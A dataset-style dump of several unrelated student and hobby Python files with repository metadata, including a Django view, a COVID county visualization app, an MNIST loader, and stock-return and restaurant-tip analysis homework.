4e26bbd2df58bab646493c8d01198a36113d012b | 8b99655d0c3920143aa3a0945f05e7d16526788a | /python基础/异常捕获.py | a54adadeae5439d13f481cd08fb5ce153802a54d | [] | no_license | nicecode996/Python_Test | 8e79373db83caf39521425b2be16416655d3ae8e | 7a26b44cbb9e72c1039ed6c0e4961c4b35472192 | refs/heads/master | 2023-08-16T00:27:03.029817 | 2021-09-27T14:55:01 | 2021-09-27T15:18:20 | 410,270,104 | 0 | 0 | null | 2021-09-26T15:16:31 | 2021-09-25T12:44:03 | Python | UTF-8 | Python | false | false | 533 | py | #! usr/bin/env python3
# coding=utf-8
# try:
# num1 = int(input("输入一个整数:"))
# num2 = int(input("输入一个整数:"))
# print(num1/num2)
# except ValueError:
# print("请输入数值型")
# except ZeroDivisionError:
# print("除数不为0")
# else:
# print("程序没有异常")
# x = 5
# if x > 1:
# raise Exception("这是一个异常")
class MyException(Exception):
def __init__(self,value1,value2):
self.value1 = value1
self.value2 = value2
raise MyException("JJJJ")
| [
"19913148542@163.com"
] | 19913148542@163.com |
1217dc9aad892ceabb4e39f38732b3be4c7fcb2f | 15f0322573b8b1b1668c248a428fa27d2244ab99 | /glug/views.py | 41e2cd5d3e88ee2607ebf455b812061ee5d22540 | [] | no_license | spoorthis12/my-first-blog | b2465a37c48cbadf36f9ff607e4428e42f499fb7 | 882ce2702bc3b0691d6d324bc214800157f23abe | refs/heads/master | 2021-01-10T03:42:45.123150 | 2016-03-09T01:12:50 | 2016-03-09T01:12:50 | 53,430,401 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 141 | py | from django.shortcuts import render
# Create your views here.
def post_list(request):
return render(request, 'glug/post_list.html', {})
| [
"universalgreen1972@gmail.com"
] | universalgreen1972@gmail.com |
4dce6aca511eb41feeab368a9e2aa4e6b425ce74 | 22535a06ed985cd10048055bb310e9204d95702e | /module_3/zad_98/homework_1/main.py | d3b3e46ff68066e6bd1560473773ed79a5e7744d | [] | no_license | Nanutu/python-poczatek | 56f077f54d5e8a29405addbe53c9d5826542ade2 | af219febb62b1f76435365ca7a2a7797d2fd01d7 | refs/heads/master | 2023-02-15T07:09:37.098394 | 2021-01-08T02:06:53 | 2021-01-08T02:06:53 | 314,753,529 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,831 | py | # Wykorzystaj metodę super do odwołania się z poziomu klasy ExpressOrder do bazowej implementacji metody total_price i
# zastąp powtórzony w klasie potomnej algorytm wynikiem z tego odwołania.
#
# Pamiętaj, że łączna wartość zamówienia ekspresowego to:
# # łączna wartość zamówienia policzona według bazowej metody + opłata za ekspresową dostawę.
from shop.data_generator import generate_order_elements
from shop.discount_policy import PercentageDiscount, AbsoluteDiscount
from shop.order import Order
from shop.express_order import ExpressOrder
def run_homework():
order_elements = generate_order_elements(11)
five_percent_discount = PercentageDiscount(discount_percentage=5)
hundred_pln_discount = AbsoluteDiscount(discount_value=100)
order = Order(client_first_name="Maciej", client_last_name="Xyz", order_elements=order_elements)
order_5_percent = Order(client_first_name="Maciej", client_last_name="Xyz", order_elements=order_elements,
discount_policy=five_percent_discount)
order_100 = Order(client_first_name="Maciej", client_last_name="Xyz", order_elements=order_elements,
discount_policy=hundred_pln_discount)
express_order = ExpressOrder(delivery_date="20th December 2020", client_first_name="Maciej",
client_last_name="Sobieszuk", order_elements=order_elements)
express_order_discount = ExpressOrder(delivery_date="20th December 2020", client_first_name="Maciej",
client_last_name="Sobieszuk", order_elements=order_elements, discount_policy=hundred_pln_discount)
print(order)
print(order_5_percent)
print(order_100)
print(express_order)
print(express_order_discount)
if __name__ == '__main__':
run_homework()
| [
"maciek.sobieszuk@gmail.com"
] | maciek.sobieszuk@gmail.com |
3e328de1c0c7c548ffcdc4dfe4245b69fc6a10cf | c5fb1b19dfb2e09a467b82312bc543b41bf09311 | /venv/bin/jupyter-notebook | 14402b5b0089189da18a0938bc5d0478fa3df764 | [] | no_license | jkam32/python_playground | badb8a281ca4c11155bd2ab8fca94bfc7c2f5097 | ef90dd29ddbd633e03caa273ee9adcb983444911 | refs/heads/master | 2020-03-27T20:32:35.407852 | 2018-09-30T09:20:35 | 2018-09-30T09:20:35 | 147,076,562 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 265 | #!/home/js/PycharmProjects/python_playground/venv/bin/python
# -*- coding: utf-8 -*-
import re
import sys
from notebook.notebookapp import main
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(main())
| [
"jkam32@siswa.um.edu.my"
] | jkam32@siswa.um.edu.my | |
8c0c4481c0dcb0f0acdf102417132479cee97925 | 3e8ad0a8c52996d614dfc868f1431d7e71ac85d9 | /src/input_data.py | 3c9e9b1e5b28e6fcb8e2b35bb834e5e18c5af50a | [] | no_license | seraphium/neural-networks-and-deep-learning | a6ecc825a865fdbc883db72172f0b9d5b49d0e51 | 230f295026295694c95a06f3fb98c3fc67e2fae2 | refs/heads/master | 2021-01-23T06:19:49.776857 | 2017-04-10T16:49:21 | 2017-04-10T16:49:21 | 86,352,363 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,227 | py | # Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Functions for downloading and reading MNIST data."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import gzip
import os
import tempfile
import numpy
from six.moves import urllib
from six.moves import xrange # pylint: disable=redefined-builtin
import tensorflow as tf
from tensorflow.contrib.learn.python.learn.datasets.mnist import read_data_sets
from tensorflow.examples.tutorials.mnist import input_data
mnist = input_data.read_data_sets("MNIST_data", one_hot=True) | [
"viperking@163.com"
] | viperking@163.com |
28adf6066f1298f7c1751bea4082fea4e3ed1570 | f44a5803dbfa854de26d354f9e8db0f808d304f8 | /tp3.py | 651e553182f15955f5f51b48d2816b23e38ea3d9 | [] | no_license | MartinA731/Covid-Simulation | 5100b7375293271487eca955469e3d8baeddcca0 | 58baf2877f76b99281c68610884c2fb24b7cb16d | refs/heads/main | 2023-02-10T19:40:37.084687 | 2020-12-26T23:26:18 | 2020-12-26T23:26:18 | 324,649,486 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 11,655 | py | import pandas as pd
from cmu_112_graphics import *
from tkinter import *
import states
import random
def appStarted(app):
    """Initialize all model state for the menu, county data, and circles."""
    # menu / flow flags
    app.countyCalculated = False
    app.firstStep = True
    app.charsCalculated = False
    app.showVisualization = False
    app.correctInput = True
    # circle-simulation state
    app.pos = []
    app.R = 4
    app.blueCircles = []
    app.redCircles = []
    app.numBlueCircles = 0
    app.numRedCircles = 0
    app.dirX = "right"
    app.dirY = "up"
    # one simulation step per second
    app.timerDelay = 1000
def createPosn(app, cases, deaths):
    """Spawn circles for one day's new cases/deaths, then age out blues.

    Blue circles are active cases (born at "day" -1, retired once they
    reach 14 days); red circles are deaths and persist forever.
    """
    for _ in range(cases):
        cx = random.randint(0, app.width)
        cy = random.randint(int(app.height / 10), app.height)
        app.pos.append([cx, cy, "blue", -1, "right", "up"])
        app.blueCircles.append([cx, cy, "blue", -1])
    app.numBlueCircles = len(app.blueCircles)
    for _ in range(deaths):
        cx = random.randint(0, app.width)
        cy = random.randint(int(app.height / 10), app.height)
        app.pos.append([cx, cy, "red", -1, "right", "up"])
        app.redCircles.append([cx, cy, "red", -1])
    app.numRedCircles = len(app.redCircles)
    # Age every blue circle by one day and retire 14-day-old ones.
    # Iterate over a snapshot: the original removed elements from app.pos
    # while iterating it, which silently skips the element after each
    # removal and leaves expired circles on screen.
    for circle in list(app.pos):
        if circle[2] == "blue":
            circle[3] += 1
            if circle[3] >= 14:
                app.pos.remove(circle)
def moveCircles(app):
    """Randomly jitter each circle and bounce its direction off the edges.

    The top boundary is the caption band at height//10; the original
    compared y against width//10, which is wrong for non-square windows
    (createPosn and drawVisualization both place the band by height).
    """
    max_dx = app.width // 20
    max_dy = app.height // 20
    for circle in app.pos:
        # horizontal step in the current x-direction
        if circle[4] == "right":
            circle[0] += random.randint(0, max_dx)
        elif circle[4] == "left":
            circle[0] -= random.randint(0, max_dx)
        # vertical step in the current y-direction
        if circle[5] == "up":
            circle[1] -= random.randint(0, max_dy)
        elif circle[5] == "down":
            circle[1] += random.randint(0, max_dy)
        # bounce off the window edges
        if circle[0] >= app.width:
            circle[4] = "left"
        if circle[0] <= 0:
            circle[4] = "right"
        if circle[1] <= app.height // 10:  # was app.width // 10 (bug)
            circle[5] = "down"
        if circle[1] >= app.height:
            circle[5] = "up"
def findCircles(app):
    """Seed circles from the oldest pending daily case count.

    NOTE(review): this helper appears unused. The original called
    createPosn with only a case count, which raises TypeError because
    createPosn also requires a death count; 0 deaths keeps the call valid.
    """
    createPosn(app, app.increasesCasesL[0], 0)
def timerFired(app):
    """Advance the visualization by one day per tick once data is loaded."""
    # Spawn that day's surviving new cases (cases minus deaths) as blue
    # circles and its deaths as red, consume the day from the queues,
    # then jitter every circle.
    if(app.countyCalculated):
        createPosn(app, app.increasesCasesL[0] - app.increasesDeathsL[0],
                    app.increasesDeathsL[0])
        app.increasesCasesL.pop(0)
        app.increasesDeathsL.pop(0)
        moveCircles(app)
        app.datesL.pop(0)
def createInputLocation(app):
    """Open a blocking Tk dialog that asks for a state and county name."""
    app.root = Tk()
    title = Label(app.root, text="County Selector", font="Arial 15 bold")
    title.pack()
    # state-name entry box
    textBox1Label = Label(app.root, text='Enter your state name', width=50, height=10)
    textBox1Label.pack()
    app.textBox1 = Text(app.root, height=5, width=20)
    app.textBox1.pack()
    # county-name entry box
    textBox2Label = Label(app.root, text="Enter your county name", width=50, height=10)
    textBox2Label.pack()
    app.textBox2 = Text(app.root, height=5, width=20)
    app.textBox2.pack()
    # the handler reads both boxes and destroys the window
    button = Button(app.root, height=1, width=10, text="select",
                    command=lambda: getInputsLocation(app))
    button.pack()
    mainloop()  # blocks until getInputsLocation destroys app.root
def getInputsLocation(app):
    """Read the dialog's text boxes, close it, and fetch the county data."""
    # "1.0" = start of text widget; "end-1c" drops the trailing newline Tk adds
    app.inputState = app.textBox1.get("1.0","end-1c")
    app.inputCounty = app.textBox2.get("1.0","end-1c")
    app.root.destroy()
    getCountyData(app)
    app.countyCalculated = True
def getCountyData(app):
    """Download the NYT county-level COVID dataset and run every analysis.

    Filters the national CSV down to the user's state and county, then
    derives per-day lists, totals, increases, and week-over-week ratios.
    """
    countyData = r'https://raw.githubusercontent.com/nytimes/covid-19-data/master/us-counties.csv'
    readableData = pd.read_csv(countyData)
    app.state_data = readableData[readableData['state'] == app.inputState]
    app.county = app.state_data[app.state_data['county'] == app.inputCounty]
    createLists(app)
    # createLists flags an unknown state/county via app.correctInput; the
    # original fell through to totals(), which raised IndexError on the
    # empty lists instead of letting the retry screen appear.
    if not app.correctInput:
        return
    totals(app)
    increases(app)
    analysisIncreasesCases(app)
    app.loadingCalculating = False
def createLists(app):
    """Flatten the county DataFrame into parallel per-day lists.

    Sets app.correctInput to False and stops early when the state/county
    filter matched no rows (i.e. invalid user input).
    """
    app.datesL = []
    app.countiesL = []
    app.statesL = []
    app.casesL = []
    app.deathsL = []
    for date in app.county.date:
        app.datesL.append(date)
    # no dates means the state/county pair matched nothing
    if(len(app.datesL) == 0):
        app.correctInput = False
        return
    else:
        app.correctInput = True
    for county in app.county.county:
        app.countiesL.append(county)
    for state in app.county.state:
        app.statesL.append(state)
    for cases in app.county.cases:
        app.casesL.append(cases)
    for deaths in app.county.deaths:
        app.deathsL.append(deaths)
def totals(app):
    """Cache the day count and the latest cumulative case/death totals."""
    app.totalRecorded = len(app.datesL)
    app.totalCases = app.casesL[-1]
    app.totalDeaths = app.deathsL[-1]
def increases(app):
    """Build day-over-day increase lists from the cumulative lists."""
    # first recorded day has no predecessor, so its increase is 0
    app.increasesCasesL = [0]
    app.increasesDeathsL = [0]
    for prev, curr in zip(app.casesL, app.casesL[1:]):
        app.increasesCasesL.append(curr - prev)
    for prev, curr in zip(app.deathsL, app.deathsL[1:]):
        app.increasesDeathsL.append(int(curr - prev))
def avgIncreaseCases(app, n):
    """Return the mean daily case increase over the final n recorded days."""
    length = len(app.increasesCasesL)
    total = sum(app.increasesCasesL[i] for i in range(length - n, length))
    return total / n
def avgIncreaseDeaths(app, n):
    """Return the mean daily death increase over the final n recorded days."""
    length = len(app.increasesDeathsL)
    total = sum(app.increasesDeathsL[i] for i in range(length - n, length))
    return total / n
def analysisIncreasesCases(app):
    """Compute 1-, 4-, and 12-week case totals and their ratios.

    Requires at least 84 recorded days (12 weeks) of increases.
    """
    daily = app.increasesCasesL
    end = len(daily)
    app.last12WeeksInc = sum(daily[i] for i in range(end - 84, end))
    app.last4WeeksInc = sum(daily[i] for i in range(end - 28, end))
    app.lastWeekInc = sum(daily[i] for i in range(end - 7, end))
    # share of recent activity: week-of-month and month-of-quarter ratios
    app.weekToMonth = app.lastWeekInc / app.last4WeeksInc
    app.monthTo3Months = app.last4WeeksInc / app.last12WeeksInc
def keyPressed(app, event):
    """Route keyboard input between the menu, sub-modules, and views."""
    # '1': open the county-selector dialog (once)
    if(event.key == "1" and app.countyCalculated == False):
        app.firstStep = False
        createInputLocation(app)
    # 's': retry after an invalid state/county was entered
    if(not app.correctInput and event.key == "s"):
        createInputLocation(app)
    # '2'/'3': importing these modules runs them — presumably each import
    # starts its simulation as a side effect (NOTE(review): verify)
    if(event.key == "2" and app.charsCalculated == False):
        app.firstStep = False
        import groceryStore
    if(event.key == "3"):
        import visual
    # 'b': restart the app window
    # NOTE(review): 'and' binds tighter than 'or', so this fires for ANY
    # key once charsCalculated is True — confirm that is intended.
    if(event.key == "b" and app.countyCalculated or app.charsCalculated):
        runApp(width=1500, height=1500)
    # 'n': switch to the animated circle visualization
    if(event.key == "n" and app.countyCalculated):
        app.showVisualization = True
def announcements(app, canvas):
    """Draw the yellow main-menu screen while no mode has been picked."""
    if(app.firstStep):
        canvas.create_rectangle(0,0,app.width,app.height,fill="yellow")
        canvas.create_text(app.width/2, app.height/10,
                           text='What do you want to do?',
                           font='Arial 30 bold')
        canvas.create_text(app.width/2, app.height/3,
                           text='1) Calculate detailed location data by county',
                           font='Arial 20 bold')
        canvas.create_text(app.width/2, app.height/2,
                           text='2) Start grocery store simulation',
                           font='Arial 20 bold')
        canvas.create_text(app.width/2, 2*app.height/3,
                           text='3) Start general infection simulation',
                           font='Arial 20 bold')
def drawCountyCalcs(app,canvas):
    """Draw the green summary screen of 1/4/12-week case statistics.

    Hidden while the animated visualization is showing; the numbers come
    from analysisIncreasesCases.
    """
    if(not app.showVisualization):
        canvas.create_rectangle(0,0,app.width,app.height,fill="green")
        canvas.create_text(app.width/2, app.height/8,
                           text='Calculated risk based on county location: ',
                           font='Arial 20 bold')
        canvas.create_text(app.width/2, app.height/4,
                           text="Over the last week, there are " +
                           str(app.lastWeekInc) + " cases.",
                           font='Arial 15 bold')
        canvas.create_text(app.width/2, 3*app.height/8,
                           text="Over the last 4 weeks, there are " +
                           str(app.last4WeeksInc) + " cases.",
                           font='Arial 15 bold')
        canvas.create_text(app.width/2, app.height/2,
                           text="Over the last 12 weeks, there are " +
                           str(app.last12WeeksInc) + " cases.",
                           font='Arial 15 bold')
        canvas.create_text(app.width/2, 5*app.height/8,
                           text="The cases from the last week account for " +
                           str(round(app.weekToMonth*100,3)) + "%" +
                           " of the cases from the last 4 weeks." ,
                           font='Arial 15 bold')
        canvas.create_text(app.width/2, 3*app.height/4,
                           text="The cases from the last 4 weeks account for " +
                           str(round(app.monthTo3Months*100,3)) + "%" +
                           " of the cases from the last 12 weeks." ,
                           font='Arial 15 bold')
        canvas.create_text(app.width/2, 7*app.height/8,
                           text="press 'n' to look at visual" ,
                           font='Arial 10 bold')
def drawCharsCalcs(app, canvas):
    """Render the characteristics-analysis summary text.

    NOTE(review): app.worseConds / app.betterConds are never assigned in
    this module — presumably the groceryStore module sets them; verify.
    """
    canvas.create_text(app.width/2, 7*app.height/8,
                       text=str(app.worseConds) + str(app.betterConds),
                       font='Arial 10 bold')
def drawVisualization(app, canvas):
    """Draw every case/death circle plus a caption for the current day."""
    canvas.create_rectangle(0,0,app.width,app.height,fill="orange")
    # each circle is [cx, cy, color, age, x-dir, y-dir]; radius is app.R
    for circle in app.pos:
        cx0 = circle[0] - app.R
        cy0 = circle[1] - app.R
        cx1 = circle[0] + app.R
        cy1 = circle[1] + app.R
        color = circle[2]
        canvas.create_oval(cx0,cy0,cx1,cy1,fill=color)
    # caption describes the day currently at the head of the date queue
    canvas.create_text(app.width/2, app.height/20,
                       text="There were " + str(app.numBlueCircles) +
                       " (blue) active cases and " + str(app.numRedCircles) +
                       " (red) deaths in " + str(app.inputCounty) +
                       " county, " + str(app.inputState) + " during " +
                       str(app.datesL[0]),
                       font='Arial 10 bold')
    canvas.create_text(app.width/2, 7*app.height/8,
                       text="press 'b' to return to start" ,
                       font='Arial 10 bold')
def drawCorrectInput(app,canvas):
    """Error screen shown when the state/county lookup matched nothing."""
    canvas.create_rectangle(0,0,app.width,app.height,fill="orange")
    canvas.create_text(app.width/2,app.height/2,text="""Invalid state and/or
    county, press s to try again""", font="Arial 25 bold")
def redrawAll(app,canvas):
    """Compose the current frame from whichever views are active."""
    # later draws paint over earlier ones, so order matters here
    announcements(app,canvas)
    if(app.countyCalculated):
        drawCountyCalcs(app, canvas)
    if(app.showVisualization):
        drawVisualization(app,canvas)
    if(app.charsCalculated):
        drawCharsCalcs(app,canvas)
    if(not app.correctInput):
        drawCorrectInput(app,canvas)
# Launch the 1500x1500 cmu_112_graphics window; blocks until it is closed.
runApp(width=1500, height=1500)
"noreply@github.com"
] | noreply@github.com |
2b12a582682d85608b392f14ce3177ebc146e1d6 | 25cf3a270879dc1d14c258be9b09964ae97cc6f3 | /Homework6/Homework6.py | b61ae8612042f565cbff8c270edef4e293030ca5 | [] | no_license | Zxr1230/cs677 | 58b048429cf028c51df9e6bbdd913d041ea951f9 | f8b232356e99b674205a6001aef7756e99b666be | refs/heads/master | 2020-06-19T22:09:06.331194 | 2019-04-30T01:01:34 | 2019-04-30T01:01:34 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 12,411 | py | """
Jimmy Goddard
3/9/19
CS 677 Assignment 6
"""
import datetime
import os
import platform
import statistics
import matplotlib.pyplot as plt
import pandas as pd
import seaborn as sns
from pandas_datareader import data as web
# Column-name constants. Most are columns produced by get_stock; a few
# (Week, Week Label, Overnight Gain) are added later by the script body.
HEADER_LONG = 'Long_MA'
HEADER_SHORT = 'Short_MA'
HEADER_WEEK = 'Week'
HEADER_RETURN = 'Return'
HEADER_DATE = 'Date'
HEADER_AVG = 'Rolling AVG'
HEADER_SD = 'Rolling SD'
HEADER_PRICE = 'Adj Close'
HEADER_YEAR = 'Year'
HEADER_LABEL = 'Week Label'
HEADER_OPEN = 'Open'
HEADER_OVERNIGHT = 'Overnight Gain'
def get_stock(ticker, start_date, end_date, s_window, l_window):
    """Download daily prices from Yahoo and derive return/MA columns.

    :param ticker: stock symbol, e.g. 'GS'
    :param start_date: first trading day, 'YYYY-MM-DD'
    :param end_date: last trading day, 'YYYY-MM-DD'
    :param s_window: window (days) for the short rolling mean
    :param l_window: window (days) for the long rolling mean
    :return: DataFrame with date parts, daily Return, and short/long
        rolling means of Adj Close — or None on any failure (the broad
        except below prints the error instead of raising).
    """
    try:
        df = web.get_data_yahoo(ticker, start=start_date, end=end_date)
        df[HEADER_RETURN] = df[HEADER_PRICE].pct_change()
        # first row has no previous close, so pct_change yields NaN
        df[HEADER_RETURN].fillna(0, inplace=True)
        df[HEADER_DATE] = df.index
        df[HEADER_DATE] = pd.to_datetime(df[HEADER_DATE])
        df['Month'] = df[HEADER_DATE].dt.month
        df['Year'] = df[HEADER_DATE].dt.year
        df['Day'] = df[HEADER_DATE].dt.day
        for col in [HEADER_OPEN, 'High', 'Low', 'Close', HEADER_PRICE]:
            df[col] = df[col].round(2)
        # NOTE(review): Series.dt.weekday_name is removed in newer pandas
        # (use dt.day_name()); confirm the pinned pandas version.
        df['Weekday'] = df[HEADER_DATE].dt.weekday_name
        df[HEADER_SHORT] = df[HEADER_PRICE].rolling(window=s_window, min_periods=1).mean()
        df[HEADER_LONG] = df[HEADER_PRICE].rolling(window=l_window, min_periods=1).mean()
        col_list = [HEADER_DATE, 'Year', 'Month', 'Day', 'Weekday', HEADER_OPEN,
                    'High', 'Low', 'Close', 'Volume', HEADER_PRICE,
                    HEADER_RETURN, HEADER_SHORT, HEADER_LONG]
        df = df[col_list]
        return df
    except Exception as error:
        print(error)
        return None
def get_last_digit(y):
    """Return the hundredths digit of y rounded to two decimals (0 if absent)."""
    rounded = str(round(float(y), 2))
    _whole, _dot, fraction = rounded.partition('.')
    if len(fraction) == 1:
        # only a tenths digit survived rounding, e.g. "3.1" -> 0
        return 0
    return int(fraction[1])
def get_data_table(ticker='GS', start_date='2014-01-01', end_date='2018-12-31'):
    """
    Retrieves stock data, writes it to a CSV file and returns it as a matrix. Provided to us as is by the course
    Professor.

    Downloads via get_stock on the first call for a ticker, then serves
    the cached <ticker>.csv on later calls.

    NOTE(review): the cache directory is a hard-coded per-user path that
    must already exist, and if get_stock returned None the to_csv call
    below would raise AttributeError.

    :param ticker: stock symbol (default 'GS', Goldman Sachs)
    :param start_date: first trading day, 'YYYY-MM-DD'
    :param end_date: last trading day, 'YYYY-MM-DD'
    :return: data table matrix
    """
    # ticker = 'GS' # Goldman Sachs Group Inc
    # ticker = 'GDDY' # GoDaddy
    # ticker = 'GM' # General Motors
    # ticker = 'GRUB' # GrubHub
    # start_date = '2014-01-01'
    # end_date = '2018-12-31'
    s_window = 14
    l_window = 50
    if platform.system() == 'Windows':
        home_dir = os.path.join('C:', os.path.sep, 'Users', 'jimmy_000') # MS Windows home directory
    else: # Assumes Linux
        home_dir = os.path.join(os.path.sep + 'home', 'jgoddard') # Linux home directory
    input_dir = os.path.join(home_dir, 'src', 'git', 'CS677', 'datasets')
    output_file = os.path.join(input_dir, ticker + '.csv')
    if not os.path.isfile(output_file):
        df = get_stock(ticker, start_date, end_date, s_window, l_window)
        df.to_csv(output_file, index=False)
    else:
        df = pd.read_csv(output_file)
    return df
def get_week(local_date):
    """Return the ISO calendar week number for a 'YYYY-MM-DD' date string."""
    parsed = datetime.datetime.strptime(local_date, '%Y-%m-%d')
    return parsed.isocalendar()[1]
def label_good_weeks(good_weeks):
    """Return a labeler mapping week numbers to 'green' (good) or 'red'."""
    def get_label(week_number):
        return 'green' if week_number in good_weeks else 'red'
    return get_label
def inertia_strategy(df, r=-100):
    """Trade with the overnight move: long gap-ups, short gap-downs.

    Each trading day stakes a fixed $100 at the open and closes out at the
    adjusted close. Days whose overnight gain (as a percentage) is not
    above r are skipped, as are days with no overnight move. Returns the
    list of per-day profit/loss amounts.
    """
    budget = 100
    pnl = []
    for _, day in df.iterrows():
        gain = day[HEADER_OVERNIGHT]
        open_price = day[HEADER_OPEN]
        close_price = day[HEADER_PRICE]
        if gain * 100 <= r:
            continue  # threshold filter: not willing to trade this day
        if gain == 0:
            continue  # flat overnight: stay out of the market
        shares = budget / open_price
        if gain < 0:
            pnl.append((open_price - close_price) * shares)  # short position
        else:
            pnl.append((close_price - open_price) * shares)  # long position
    return pnl
def reverse_inertia_strategy(df, r=-100):
    """Contrarian twin of inertia_strategy: short gap-ups, buy gap-downs.

    Same $100-per-day sizing and r-percent eligibility filter; only the
    long/short decision is inverted. Returns the per-day profit/loss list.
    """
    budget = 100
    pnl = []
    for _, day in df.iterrows():
        gain = day[HEADER_OVERNIGHT]
        open_price = day[HEADER_OPEN]
        close_price = day[HEADER_PRICE]
        if gain * 100 <= r:
            continue  # threshold filter: not willing to trade this day
        if gain == 0:
            continue  # flat overnight: stay out of the market
        shares = budget / open_price
        if gain > 0:
            pnl.append((open_price - close_price) * shares)  # short position
        else:
            pnl.append((close_price - open_price) * shares)  # long position
    return pnl
def get_num_trades(trades):
    """Return the total number of executed trades."""
    return len(trades)
def get_num_profitable_trades(trades):
    """Count trades whose profit is non-negative (break-even counts)."""
    return sum(1 for trade in trades if trade >= 0)
def get_num_losing_trades(trades):
    """Count trades with a strictly negative profit."""
    return sum(1 for trade in trades if trade < 0)
def get_profit_per_profitable_trade(trades):
    """Mean profit across non-negative trades (raises if there are none)."""
    winners = [trade for trade in trades if trade >= 0]
    return statistics.mean(winners)
def get_loss_per_losing_trade(trades):
    """Mean loss across strictly negative trades (raises if there are none)."""
    losers = [trade for trade in trades if trade < 0]
    return statistics.mean(losers)
def print_trade_analysis(trades):
"""
Pretty print the trades
:param trades: list of trades
:return: void
"""
print()
print('Inertia Trade Strategy Analysis')
print('Trades\t# Profitable Trades\tProfit per Profitable Trade\t# Losing Trades\tLoss per Losing Trade')
num_trades = get_num_trades(trades)
num_prof_trades = get_num_profitable_trades(trades)
prof_per_prof_trade = get_profit_per_profitable_trade(trades)
num_losing_trades = get_num_losing_trades(trades)
loss_per_losing_trade = get_loss_per_losing_trade(trades)
print('{:6}\t{:19}\t{:27.2f}\t{:15}\t{:21.2f}'.format(
num_trades, num_prof_trades, prof_per_prof_trade, num_losing_trades, loss_per_losing_trade))
gs_df = get_data_table()
gs_df[HEADER_WEEK] = gs_df[HEADER_DATE].apply(get_week)
# criteria for a good week is that the sum of the returns for each day of that week were positive:
is_good_return_by_week = gs_df[HEADER_RETURN].groupby(gs_df[HEADER_WEEK]).sum() > 0
only_good = is_good_return_by_week[is_good_return_by_week == True].index
positive_week_dates = list(only_good)
gs_df[HEADER_LABEL] = gs_df[HEADER_WEEK].apply(label_good_weeks(positive_week_dates))
# Task 1
overnight_gains = [0]
gs_df.loc[0, HEADER_OVERNIGHT] = 0
for i in range(1, len(gs_df)):
# (open - previous close) / previous close
open_price = gs_df.loc[i, HEADER_OPEN]
previous_close = gs_df.loc[i - 1, HEADER_PRICE]
gs_df.loc[i, HEADER_OVERNIGHT] = (open_price - previous_close) / previous_close
overnight_gains.append((open_price - previous_close) / previous_close)
gs_df[HEADER_OVERNIGHT] = overnight_gains
# Task 1 part a
gs_2018 = gs_df[gs_df['Year'] == 2018]
pnl = inertia_strategy(gs_2018)
print_trade_analysis(pnl)
# Inertia Trade Strategy Analysis
# Trades # Profitable Trades Profit per Profitable Trade # Losing Trades Loss per Losing Trade
# 251 44 1.06 207 -1.74
# reverse strategy
reverse_pnl = reverse_inertia_strategy(gs_2018)
print_trade_analysis(reverse_pnl)
# Task 1 part b
plt.scatter(x=gs_2018[HEADER_OVERNIGHT].values, y=gs_2018[HEADER_RETURN].values)
plt.xlabel('Overnight Return')
plt.ylabel('Daily Return')
plt.title('2018 Daily Returns vs Overnight Returns')
plt.show()
print(gs_2018[[HEADER_OVERNIGHT, HEADER_RETURN]].corr())
# Overnight Gain Return
# Overnight Gain 1.000000 0.390044
# Return 0.390044 1.000000
# Based on both the scatter plot as well as the Pearson Correlation Coefficient, there appears to be very little
# positive linear relationship between overnight returns and daily returns
# Task 1 part c
x = range(-10, 11, 1)
y = []
for r in x:
pnl = inertia_strategy(gs_2018, r)
if len(pnl) > 0:
y.append(statistics.mean(pnl))
else:
y.append(None)
x = range(-10, 11, 1)
reverse_y = []
for r in x:
reverse_pnl = reverse_inertia_strategy(gs_2018, r)
if len(reverse_pnl) > 0:
reverse_y.append(statistics.mean(reverse_pnl))
else:
reverse_y.append(None)
plt.scatter(x=x, y=reverse_y)
plt.title('Average gain per R value')
plt.xlabel('R Value')
plt.ylabel('Average gain')
plt.show()
# Task 2
tips = sns.load_dataset('tips')
tips['percentage'] = ((tips['tip'] / tips['total_bill']) * 100).round(2)
# question 1
print(tips.groupby(['time'])['tip'].mean())
# time
# Lunch 2.728088
# Dinner 3.102670
# Name: tip, dtype: float64
# question 2
print(tips.groupby(['day', 'time'])['tip'].mean())
# day time
# Thur Lunch 2.767705
# Dinner 3.000000
# Fri Lunch 2.382857
# Dinner 2.940000
# Sat Dinner 2.993103
# Sun Dinner 3.255132
# Name: tip, dtype: float64
print(tips.groupby(['day', 'time'])['percentage'].mean())
# day time
# Thur Lunch 16.129016
# Dinner 15.970000
# Fri Lunch 18.875714
# Dinner 15.892500
# Sat Dinner 15.314598
# Sun Dinner 16.689605
# Name: percentage, dtype: float64
# question 3
sns.regplot(x="total_bill", y="tip", data=tips)
plt.title('Total bill vs Tip')
plt.xlabel('Total Bill')
plt.ylabel('Tip')
plt.show()
print(tips[['total_bill', 'percentage']].corr())
# total_bill tip
# total_bill 1.000000 0.675734
# tip 0.675734 1.000000
print(tips[['tip', 'percentage']].corr())
# tip percentage
# tip 1.000000 0.342361
# percentage 0.342361 1.000000
sns.regplot(x="tip", y="percentage", data=tips)
plt.title('Tip Percentage vs Tip')
plt.xlabel('Tip')
plt.ylabel('Tip percentage')
plt.show()
sns.regplot(x="total_bill", y="percentage", data=tips)
plt.title('Total bill vs Tip Percentage')
plt.xlabel('Total Bill')
plt.ylabel('Tip Percentage')
plt.show()
print(tips[['total_bill', 'tip']].corr())
# question 4
sns.regplot(x='total_bill', y='percentage', data=tips)
plt.title('Total bill vs Tip percentage')
plt.xlabel('Total Bill')
plt.ylabel('Tip percentage')
plt.show()
print(tips[['total_bill', 'percentage']].corr())
# total_bill percentage
# total_bill 1.000000 -0.338629
# percentage -0.338629 1.000000
# question 5
print(len(tips[tips['smoker'] == 'Yes']) / len(tips) * 100)
